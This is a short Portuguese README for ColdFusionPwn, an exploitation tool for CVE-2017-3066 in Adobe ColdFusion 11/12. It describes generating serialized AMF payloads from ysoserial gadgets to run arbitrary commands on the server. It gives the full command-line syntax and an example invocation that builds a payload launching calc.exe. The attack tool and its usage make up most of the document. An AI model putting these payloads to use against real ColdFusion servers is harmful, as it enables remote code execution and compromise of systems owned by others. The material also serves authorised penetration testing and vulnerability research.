
Ferramenta de Exploração para CVE-2017-3066 direcionada a Adobe Coldfusion 11/12
Ferramenta de Exploração para CVE-2017-3066 visando Adobe Coldfusion 11/12.
A ferramenta permite gerar payloads AMF serializados para explorar a validação de entrada ausente de classes permitidas. Para detalhes, veja nosso post no blog.
Obtenha a versão mais recente do ysoserial. Obtenha o ColdFusionPwn a partir dos releases.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Técnica Setter (CF11) ou Externalizable Exploit (CF11/12)
- [payload type] payload gadget ysoserial
- [command] comando a ser executado
- [outfile] arquivo de saída para o payload gerado
É necessário ter ColdFusionPwn-0.0.1-SNAPSHOT-all.jar como primeira entrada no classpath, pois a biblioteca ApacheCommons BeanUtils fornecida com ysoserial é mais nova (e tem um uid de serialversion diferente).
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf